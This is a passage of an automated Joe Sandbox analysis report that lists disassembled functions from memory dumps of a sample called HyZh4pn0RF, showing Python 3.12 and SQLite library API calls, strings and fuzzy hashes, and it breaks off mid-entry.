winFullPathname2, xrefs: 00007FFBAA590E55

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
Instruction ID: 92326d0cba5fbb1cc68bdb1536b152835c9205e621dc1e0e7b9657078ef50459
Opcode Fuzzy Hash: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
Instruction Fuzzy Hash: 6651D591A0E782C1F7979BB5E44067977D9AF46F88F0804B6DD4D0B696CE3CF4438628

Function 00007FFBAB6B2220 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PyFloat_AsDouble.PYTHON312 ref: 00007FFBAB6B22AF
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6B22C4
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6B2330
PyFloat_FromDouble.PYTHON312 ref: 00007FFBAB6B233E

Strings

str, xrefs: 00007FFBAB6B235A
bool, xrefs: 00007FFBAB6B22FF
mess_ratio, xrefs: 00007FFBAB6B236D
float, xrefs: 00007FFBAB6B22D4

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DoubleErr_Float_Occurred$From
String ID: bool$float$mess_ratio$str
API String ID: 627764739-3758540285
Opcode ID: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
Instruction ID: fcabca330bfb0b6869dc87e0c88860b7e96f9d9a6c3e5f82dbb070ef02a6043c
Opcode Fuzzy Hash: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
Instruction Fuzzy Hash: 324194A2A4EA4281EA139BB9EC401BAE7B0FF55784F14E131DE6D43674DF3CE5458700

Function 00007FFBAB6B3678 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B367F
PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B36A3
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B36C1
PyObject_Vectorcall.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3731
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3748
PyObject_Vectorcall.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B376D
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3784

Strings

<module>, xrefs: 00007FFBAB6B3796

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_Vectorcall$Dict_Item
String ID: <module>
API String ID: 1355803777-217463007
Opcode ID: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
Instruction ID: 0debd0464299b348cda8a14426a79d653c0c57d7c89b2e15e7ebc34e6878c1f1
Opcode Fuzzy Hash: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
Instruction Fuzzy Hash: 933116B5A8BA4281EA569FB9EC502B9A3B0FF45B90F40E435CD2D06BB1DF3DE4418700

Function 00007FFBAA5C19A0 Relevance: 14.0, APIs: 1, Strings: 8, Instructions: 478COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5C1A6C

Strings

no such column: "%s", xrefs: 00007FFBAA5C1FC7
foreign key, xrefs: 00007FFBAA5C1C43
cannot open view: %s, xrefs: 00007FFBAA5C1FDB
out of memory, xrefs: 00007FFBAA5C1AD8
cannot open %s column for writing, xrefs: 00007FFBAA5C1FA9
indexed, xrefs: 00007FFBAA5C1C90
cannot open table without rowid: %s, xrefs: 00007FFBAA5C1FE4
cannot open virtual table: %s, xrefs: 00007FFBAA5C1FED

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
API String ID: 2221118986-554953066
Opcode ID: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
Instruction ID: ad92689d326baa4358d603f9d9b1aebd0587a87b146acffd5916e569bbb70589
Opcode Fuzzy Hash: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
Instruction Fuzzy Hash: 6122AEB2A0AB81C6EB56CF35C4806AD37A8FB46B88F404176DE4D47799DF38D892C714

Function 00007FFBAB6A41E0 Relevance: 13.8, APIs: 9, Instructions: 308COMMON

Download Yara Rule

APIs

PyUnicode_FromStringAndSize.PYTHON312 ref: 00007FFBAB6A42E9
PyUnicode_InternInPlace.PYTHON312 ref: 00007FFBAB6A4302
PyBytes_FromStringAndSize.PYTHON312 ref: 00007FFBAB6A43B9
PyLong_FromString.PYTHON312 ref: 00007FFBAB6A443E
PyFloat_FromDouble.PYTHON312 ref: 00007FFBAB6A44B8
PyComplex_FromDoubles.PYTHON312 ref: 00007FFBAB6A4520
PyTuple_New.PYTHON312 ref: 00007FFBAB6A455F
PyFrozenSet_New.PYTHON312 ref: 00007FFBAB6A45CB
PySet_Add.PYTHON312 ref: 00007FFBAB6A45F7

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: From$String$Set_SizeUnicode_$Bytes_Complex_DoubleDoublesFloat_FrozenInternLong_PlaceTuple_
String ID:
API String ID: 1377717875-0
Opcode ID: 1bc6b832a9b101eb94450793bee28bff6ca2690a3c262528acd6d01682900b35
Instruction ID: a6dd2d344b964ae807114c0f56d92ecc84fc3bda0612465f3c67f62f686022c5
Opcode Fuzzy Hash: 1bc6b832a9b101eb94450793bee28bff6ca2690a3c262528acd6d01682900b35
Instruction Fuzzy Hash: ABC182A2A4AA4646EE065B7CEC60279A7B5EF05B95F48E139DE6D073A4DF2CE051C300

Function 00007FFBAB6A4D40 Relevance: 13.6, APIs: 9, Instructions: 71threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A4D4D
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A4D5F
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A4D69
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A4D78
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4DA9
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4DD2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4DFB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4E1D
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A4E38

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 2819143443-0
Opcode ID: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
Instruction ID: e5827b64d26fc42e1e372a1aca313fee84992e32fd99bcae736195493cda3208
Opcode Fuzzy Hash: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
Instruction Fuzzy Hash: 4D31D8B290B60281EB575F79DC58378B2B0BF44B69F15A238CD39422E4CF7EE4858740

Function 00007FFBAB6A3220 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

PyUnicode_New.PYTHON312 ref: 00007FFBAB6A3311
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A3358
PyErr_Format.PYTHON312 ref: 00007FFBAB6A3387
memcpy.VCRUNTIME140 ref: 00007FFBAB6A340E
_PyUnicode_FastCopyCharacters.PYTHON312 ref: 00007FFBAB6A346F

Strings

sequence item %zd: expected str instance, %.80s found, xrefs: 00007FFBAB6A3376
join() result is too long for a Python string, xrefs: 00007FFBAB6A334E

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_Unicode_$CharactersCopyFastFormatStringmemcpy
String ID: join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
API String ID: 3966466113-1579438684
Opcode ID: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
Instruction ID: 3a47249fec091ac6b96179ab213e252a0c46b98a478d1060d9f19f43c740823d
Opcode Fuzzy Hash: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
Instruction Fuzzy Hash: 4D61D4E3B0A64682EE528B6DD8007B9A6A0FB45BE0F05D635CD3D833E0DE3CD8468300

Function 00007FFBAA5E0940 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5E09DA

Strings

there is already an index named %s, xrefs: 00007FFBAA5E0BE7
sqlite_master, xrefs: 00007FFBAA5E095F, 00007FFBAA5E0AC2, 00007FFBAA5E0E07
%s %T already exists, xrefs: 00007FFBAA5E0B7C
temporary table name must be unqualified, xrefs: 00007FFBAA5E0A0E
sqlite_temp_master, xrefs: 00007FFBAA5E0997, 00007FFBAA5E0A9D
view, xrefs: 00007FFBAA5E0A6E, 00007FFBAA5E0B83
table, xrefs: 00007FFBAA5E0A75

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3510742995-2846519077
Opcode ID: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
Instruction ID: 8f7ae74b18e5c10adb408ea7e5f1fcb44e09b0b735b2de80de17caf72cc2dfe6
Opcode Fuzzy Hash: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
Instruction Fuzzy Hash: 9912BCB2A0A682C6EBA6DF25D4007A937E9FB86B88F004275DE4D07795DF3CE452C714

Function 00007FFBAB6AC130 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A6A6E), ref: 00007FFBAB6AC167
PyObject_RichCompareBool.PYTHON312(?,?,?,?,?,00007FFBAB6A6A6E), ref: 00007FFBAB6AC1AE
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A6A6E), ref: 00007FFBAB6AC1C4
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A6A6E), ref: 00007FFBAB6AC1D8
PyErr_Occurred.PYTHON312(?,?,?,?,?,00007FFBAB6A6A6E), ref: 00007FFBAB6AC273

Strings

ratio, xrefs: 00007FFBAB6AC285

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
String ID: ratio
API String ID: 2538524772-4234197119
Opcode ID: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
Instruction ID: 2986a4225fd2a970d8ae88cfd97163fc5f6b08d71425aba21df88cdfa85656c7
Opcode Fuzzy Hash: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
Instruction Fuzzy Hash: 3E5170B1A4AA0685EE565F7DDC502B8E3B0BF45B94F18A138DE3D077B1DE3DE8518200

Function 00007FFBAB6AAC10 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6AAC40
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AAC8C
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AACD4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AACEB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AAD30

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Strings

bool, xrefs: 00007FFBAB6AAC62, 00007FFBAB6AAD06
eligible, xrefs: 00007FFBAB6AAD43

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_Vectorcall$Err_FormatMethod
String ID: bool$eligible
API String ID: 131476257-3320767611
Opcode ID: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
Instruction ID: a8fa935fdce981e0055ae5f67f2bb4cb6ffc70880066ccdceaf5b7efd6638345
Opcode Fuzzy Hash: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
Instruction Fuzzy Hash: 5F4130B1A4B68281EF669B79EC502B5F3B1AF45784F48E03ADE6D066B5DE2CE440C310

Function 00007FFBAA5D7440 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 302COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5D756F
memset.VCRUNTIME140 ref: 00007FFBAA5D7622
memcpy.VCRUNTIME140 ref: 00007FFBAA5D764B
memcpy.VCRUNTIME140 ref: 00007FFBAA5D772B
memmove.VCRUNTIME140 ref: 00007FFBAA5D780D
memcpy.VCRUNTIME140 ref: 00007FFBAA5D7835

Strings

"%w" , xrefs: 00007FFBAA5D74F0
%Q%s, xrefs: 00007FFBAA5D7794

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset$memmove
String ID: "%w" $%Q%s
API String ID: 3094553269-1987291987
Opcode ID: 53d4455c39d9e03709cab2d372a67f1b55016c626a0125cd516c08a04c072d0c
Instruction ID: b061adc720b0495250ce88788624284d23625d933dac8dd13503f753cdbbf2cd
Opcode Fuzzy Hash: 53d4455c39d9e03709cab2d372a67f1b55016c626a0125cd516c08a04c072d0c
Instruction Fuzzy Hash: 30C1F2B2A0AA82C6EA16CF25E4402797BA4FB46BE0F144675DE6E077D4DF3CE442C714

Function 00007FFBAA5A0410 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 254COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5A06BD
memcpy.VCRUNTIME140 ref: 00007FFBAA5A0735

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A048C
%s at line %d of [%.10s], xrefs: 00007FFBAA5A04A4
database corruption, xrefs: 00007FFBAA5A0498

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 3510742995-3418467682
Opcode ID: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
Instruction ID: 68a039e6feee6b4ca37710cf6cb6c8b99e41f091d8ac20547eef17807425000b
Opcode Fuzzy Hash: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
Instruction Fuzzy Hash: F6A168B2B0E2D1CAD3A68B39D4546BD7BE5EB81B81F044176DF8A43641DE3CE446CB20

Function 00007FFBAB6A6060 Relevance: 12.1, APIs: 8, Instructions: 60threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A606D
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A607F
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A6089
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A6098
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A60C9
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A60F2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6114
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A612F

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 2819143443-0
Opcode ID: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
Instruction ID: bcb9bee5e22e4734cac954f9a18df6e71b624bba0ae85a4471af3080a6444076
Opcode Fuzzy Hash: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
Instruction Fuzzy Hash: 7B21F8B290A64281EB564F79DD58378B6B0EF44F69F14A238CD3A432E5CE3DE4858310

Function 00007FFBAA592B40 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 334COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA592EEA

Strings

ATTACH x AS %Q, xrefs: 00007FFBAA592BD2
misuse, xrefs: 00007FFBAA592CE7, 00007FFBAA592D4A
2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA592BB5, 00007FFBAA592D3D
API called with NULL prepared statement, xrefs: 00007FFBAA592CA4
%s at line %d of [%.10s], xrefs: 00007FFBAA592CF3, 00007FFBAA592D56
API called with finalized prepared statement, xrefs: 00007FFBAA592CBA, 00007FFBAA592D2E

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 3510742995-1033472603
Opcode ID: 4a5822ed66852f877d5263b0bfad4721e3ac3b27357557e4696c0d3347838ad2
Instruction ID: faabe3cdf62e8397246480e0571d69386f056cf6ca37a8b2a7ad5e1b9d097116
Opcode Fuzzy Hash: 4a5822ed66852f877d5263b0bfad4721e3ac3b27357557e4696c0d3347838ad2
Instruction Fuzzy Hash: A1E188A1A0AB42C1EA669B39E89427D33A8EF46F84F0451B5CE4D0B795CF3CE4468724

Function 00007FFBAA4616F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAA4617C8
PyUnicode_FromString.PYTHON312 ref: 00007FFBAA46182C
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4638EA

Strings

category, xrefs: 00007FFBAA4638E3
a unicode character, xrefs: 00007FFBAA4638D5
argument, xrefs: 00007FFBAA4638DC

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
String ID: a unicode character$argument$category
API String ID: 1318908108-2068800536
Opcode ID: 85221ed5b794fefa614671eb505fc7944d537497b256900e3b823b4235f4782d
Instruction ID: 7845104e7a5ff6976ca2bc798c7d5fc62ee17f549dd39453f3a3455858f5ad34
Opcode Fuzzy Hash: 85221ed5b794fefa614671eb505fc7944d537497b256900e3b823b4235f4782d
Instruction Fuzzy Hash: 6851BBE6F1A686C1EB568B29D4502B863A9EB84F84F481075FE4F47790DF3CE856C360

Function 00007FFBAB6AE1B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON312(?,?,?,?,?,00007FFBAB6A7DCE), ref: 00007FFBAB6AE24E
